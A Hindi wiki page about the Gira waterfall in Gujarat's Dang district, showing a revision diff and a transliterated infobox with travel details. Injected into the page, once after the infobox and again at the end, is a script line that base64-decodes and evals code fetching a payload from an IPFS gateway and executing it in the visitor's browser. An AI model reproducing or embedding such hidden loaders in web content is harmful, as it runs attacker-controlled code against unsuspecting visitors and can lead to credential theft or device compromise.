Difference between revisions of "गीरा जलप्रपात"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''गीरा जलप्रपात''' गुजरात के ख़ूबसूरत पर्यटन स्थलों ...' के साथ नया पन्ना बनाया)
 
m (Text replacement - "तेजी " to "तेज़ी")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 +
{{सूचना बक्सा पर्यटन
 +
|चित्र=Gira-Waterfalls-In-Dangs.JPG
 +
|चित्र का नाम=गीरा जलप्रपात
 +
|विवरण='गीरा जलप्रपात' [[गुजरात]] के प्रसिद्ध पर्यटन स्थलों में से एक है। इस प्रपात का जल प्राकृतिक रूप से 30 मीटर की ऊंचाई से अंबिका नदी में गिरता है।
 +
|राज्य=[[गुजरात]]
 +
|केन्द्र शासित प्रदेश=
 +
|ज़िला=[[डांग]]
 +
|निर्माता=
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=[[सापूतारा]]-वाघई मार्ग से एक किलोमीटर की दूरी पर स्थित
 +
|मौसम=
 +
|तापमान=
 +
|प्रसिद्धि=
 +
|कब जाएँ=[[जून]] से [[नवम्बर]]
 +
|कैसे पहुँचें=
 +
|हवाई अड्डा=बडोदरा
 +
|रेलवे स्टेशन=वघई
 +
|बस अड्डा=वघई और [[अहमदाबाद]]
 +
|यातायात=
 +
|क्या देखें=
 +
|कहाँ ठहरें=
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=
 +
|ए.टी.एम=
 +
|सावधानी=
 +
|मानचित्र लिंक=
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=[[जून]] से [[नवंबर]] तक यह प्रपात अपने पूरे शबाब पर रहता है। खाने-पीने के स्टॉल और पिकनिक हट्स इसे एक बेहतरीन पिकनिक स्थल बनाते हैं।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
 
'''गीरा जलप्रपात''' [[गुजरात]] के ख़ूबसूरत पर्यटन स्थलों में से एक है। यह जलप्रपात दक्षिणी गुजरात के [[डांग ज़िला|डांग ज़िले]] में [[सापूतारा]]-वाघई मार्ग से एक किलोमीटर की दूरी पर स्थित है।  
 
'''गीरा जलप्रपात''' [[गुजरात]] के ख़ूबसूरत पर्यटन स्थलों में से एक है। यह जलप्रपात दक्षिणी गुजरात के [[डांग ज़िला|डांग ज़िले]] में [[सापूतारा]]-वाघई मार्ग से एक किलोमीटर की दूरी पर स्थित है।  
  
Line 4: Line 45:
 
*गीरा जलप्रपात सभी लोगों के लिए खुला है और किराए पर जीप लेकर यहां पहुंचा जा सकता है।
 
*गीरा जलप्रपात सभी लोगों के लिए खुला है और किराए पर जीप लेकर यहां पहुंचा जा सकता है।
 
*[[जून]] से [[नवंबर]] तक यह प्रपात अपने पूरे शबाब पर रहता है। खाने-पीने के स्टॉल और पिकनिक हट्स इसे एक बेहतरीन पिकनिक स्थल बनाते हैं।
 
*[[जून]] से [[नवंबर]] तक यह प्रपात अपने पूरे शबाब पर रहता है। खाने-पीने के स्टॉल और पिकनिक हट्स इसे एक बेहतरीन पिकनिक स्थल बनाते हैं।
*यहाँ राज्य परिवहन की बसें और निजी आरामदायक टैक्सी वघई और [[अहमदाबाद]] से ली जा सकती हैं। यदि पर्यटक अपनी निजी कार से आ रहे हैं तो राजकीय मार्ग इसमें ज्यादा तेजी से मददगार साबित होगा। लेकिन इस मार्ग से सीधे और तेज यात्रा करनी पडेगी।
+
*यहाँ राज्य परिवहन की बसें और निजी आरामदायक टैक्सी वघई और [[अहमदाबाद]] से ली जा सकती हैं। यदि पर्यटक अपनी निजी कार से आ रहे हैं तो राजकीय मार्ग इसमें ज्यादा तेज़ीसे मददगार साबित होगा। लेकिन इस मार्ग से सीधे और तेज यात्रा करनी पडेगी।
 
*सबसे नजदीकी रेलवे स्टेशन वघई है, जो पश्चिमी रेलवे लाइन के वघई-विलमोरा नैरोगेज रेल सेक्शन पर स्थित है। उन यात्रियों के लिए, जो [[गुजरात]] से [[सूरत]], [[अहमदाबाद]] और [[मुंबई]] होते हुए आ रहे हैं, विलमोरा सबसे नजदीकी रेलवे मुख्यालय है और यहां से सीधी बस सेवा भी उपलब्ध है।
 
*सबसे नजदीकी रेलवे स्टेशन वघई है, जो पश्चिमी रेलवे लाइन के वघई-विलमोरा नैरोगेज रेल सेक्शन पर स्थित है। उन यात्रियों के लिए, जो [[गुजरात]] से [[सूरत]], [[अहमदाबाद]] और [[मुंबई]] होते हुए आ रहे हैं, विलमोरा सबसे नजदीकी रेलवे मुख्यालय है और यहां से सीधी बस सेवा भी उपलब्ध है।
 
*वायुमार्ग द्वारा नजदीकी हवाई अड्डा [[बडोदरा]] है, जो 309 कि.मी. दूर है।
 
*वायुमार्ग द्वारा नजदीकी हवाई अड्डा [[बडोदरा]] है, जो 309 कि.मी. दूर है।

Latest revision as of 08:20, 10 February 2021

gira jalaprapat
vivaran 'gira jalaprapat' gujarat ke prasiddh paryatan sthaloan mean se ek hai. is prapat ka jal prakritik roop se 30 mitar ki ooanchaee se aanbika nadi mean girata hai.
rajy gujarat
zila daang
marg sthiti sapootara-vaghee marg se ek kilomitar ki doori par sthit
kab jaean joon se navambar
havaee adda badodara
relave steshan vaghee
bas adda vaghee aur ahamadabad
any janakari joon se navanbar tak yah prapat apane poore shabab par rahata hai. khane-pine ke st aaul aur pikanik hats ise ek behatarin pikanik sthal banate haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gira jalaprapat gujarat ke khoobasoorat paryatan sthaloan mean se ek hai. yah jalaprapat dakshini gujarat ke daang zile mean sapootara-vaghee marg se ek kilomitar ki doori par sthit hai.

  • yah jalaprapat prakritik roop se 30 mitar ki ooanchaee se aanbika nadi mean girata hai.
  • gira jalaprapat sabhi logoan ke lie khula hai aur kirae par jip lekar yahaan pahuancha ja sakata hai.
  • joon se navanbar tak yah prapat apane poore shabab par rahata hai. khane-pine ke st aaul aur pikanik hats ise ek behatarin pikanik sthal banate haian.
  • yahaan rajy parivahan ki basean aur niji aramadayak taiksi vaghee aur ahamadabad se li ja sakati haian. yadi paryatak apani niji kar se a rahe haian to rajakiy marg isamean jyada tezise madadagar sabit hoga. lekin is marg se sidhe aur tej yatra karani padegi.
  • sabase najadiki relave steshan vaghee hai, jo pashchimi relave lain ke vaghee-vilamora nairogej rel sekshan par sthit hai. un yatriyoan ke lie, jo gujarat se soorat, ahamadabad aur muanbee hote hue a rahe haian, vilamora sabase najadiki relave mukhyalay hai aur yahaan se sidhi bas seva bhi upalabdh hai.
  • vayumarg dvara najadiki havaee adda badodara hai, jo 309 ki.mi. door hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>